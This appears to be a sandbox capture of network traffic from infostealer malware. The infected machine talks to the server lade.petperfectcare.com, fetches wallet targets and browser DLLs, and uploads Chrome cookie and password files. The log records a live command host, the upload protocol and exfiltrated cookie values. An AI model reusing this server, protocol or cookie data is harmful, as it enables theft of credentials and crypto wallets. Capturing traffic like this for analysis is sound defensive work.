6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 2d 2d 0d 0a Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="mode"21------IDHDGIEHJJJJEBGDAFHJ--
Oct 7, 2024 03:15:34.761051893 CEST	282	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180
Oct 7, 2024 03:15:34.966438055 CEST	191	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH Host: lade.petperfectcare.com Content-Length: 6253 Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:34.966439009 CEST	6253	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------BFCFBKKKFHCFHJ
Oct 7, 2024 03:15:35.799221039 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 7, 2024 03:15:35.801908970 CEST	105	OUT	GET /sql.dll HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:36.008620977 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:35 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT Connection: keep-alive ETag: "6560a86a-258600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZYPELi`e!% {D %@#6$($$`#8x#@$.textG `.rdata" $ @@.data4\| $b#@.idata$^$@@.00cfg$p$@@.rsrc$r$@@.reloc5$$@B
Oct 7, 2024 03:15:36.008661032 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc cc cc cc cc e9 8b 17 1c 00 e9 a0 11 1d 00 e9 bf ab 1b 00 e9 a2 44 1c 00 e9 3b 27 1d 00 e9 cc 5a 1d 00 e9 95 a9 1c 00 e9 Data Ascii: D;'ZRxs\tNg4^0Gb&OlpjBT%{rf:%oR}r
Oct 7, 2024 03:15:36.008694887 CEST	448	IN	Data Raw: e9 de dd 1a 00 e9 38 5b 1e 00 e9 03 3c 1c 00 e9 d8 5a 1b 00 e9 36 f6 1d 00 e9 a1 53 1c 00 e9 fd 8f 1c 00 e9 5c c1 1b 00 e9 7e a0 1a 00 e9 cf ff 1e 00 e9 f6 9f 1a 00 e9 68 00 1e 00 e9 b8 b0 1f 00 e9 32 5a 1d 00 e9 43 81 1e 00 e9 c5 06 1b 00 e9 b0 Data Ascii: 8[<Z6S\~h2ZC;<V.++-9nq(+:FEska9_U`GiY! O<'_zBo0q
Oct 7, 2024 03:15:36.008783102 CEST	1236	IN	Data Raw: 03 00 e9 70 c0 1b 00 e9 04 5d 1e 00 e9 94 23 1f 00 e9 8f a3 17 00 e9 0f 8b 1e 00 e9 22 93 1c 00 e9 23 93 1e 00 e9 4b a4 00 00 e9 f6 4c 1c 00 e9 41 ac 17 00 e9 8c 2b 03 00 e9 d7 4c 1e 00 e9 56 04 1e 00 e9 c8 f9 1c 00 e9 78 60 1b 00 e9 8d 20 20 00 Data Ascii: p]#"#KLA+LVx` `Q#,y.La={dGMDmN yCcZh-VC>0q#W
Oct 7, 2024 03:15:38.116668940 CEST	1019	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC Host: lade.petperfectcare.com Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 [TRUNCATED] Data Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="file_name"Q29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="file_data"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------JEGHJKFHJJJKJJJJKEHC--
Oct 7, 2024 03:15:38.911436081 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 7, 2024 03:15:39.017656088 CEST	627	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF Host: lade.petperfectcare.com Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 [TRUNCATED] Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="file_data"------FIEHDBGDHDAECBGDHJKF--
Oct 7, 2024 03:15:39.775851011 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 7, 2024 03:15:39.928410053 CEST	627	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJ Host: lade.petperfectcare.com Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 [TRUNCATED] Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="file_data"------AFHJJEHIEBKKFIDHDGHJ--
Oct 7, 2024 03:15:40.689795971 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 7, 2024 03:15:40.870466948 CEST	109	OUT	GET /freebl3.dll HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:41.077243090 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:40 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-a7550" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 7, 2024 03:15:41.821785927 CEST	109	OUT	GET /mozglue.dll HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:42.028529882 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:41 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-94750" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 7, 2024 03:15:42.435640097 CEST	110	OUT	GET /msvcp140.dll HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:42.642710924 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:42 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-6dde8" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 7, 2024 03:15:42.954788923 CEST	110	OUT	GET /softokn3.dll HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:43.161537886 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:43 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-3ef50" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 7, 2024 03:15:43.279947042 CEST	114	OUT	GET /vcruntime140.dll HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:43.486717939 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:43 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-13bf0" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 7, 2024 03:15:43.510622978 CEST	106	OUT	GET /nss3.dll HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:43.717580080 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:43 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: keep-alive ETag: "6315a9f4-1f3950" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 7, 2024 03:15:45.013850927 CEST	104	IN	POST %s HTTP/1.0 Host: %s%s Content-Type: application/ocsp-request Content-Length: %u Data Raw: 00 47 45 54 20 25 73 20 48 54 54 50 Data Ascii: GET %s HTTP
Oct 7, 2024 03:15:45.411303043 CEST	191	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJDHDGDAAKECAKJDAE Host: lade.petperfectcare.com Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:46.353655100 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
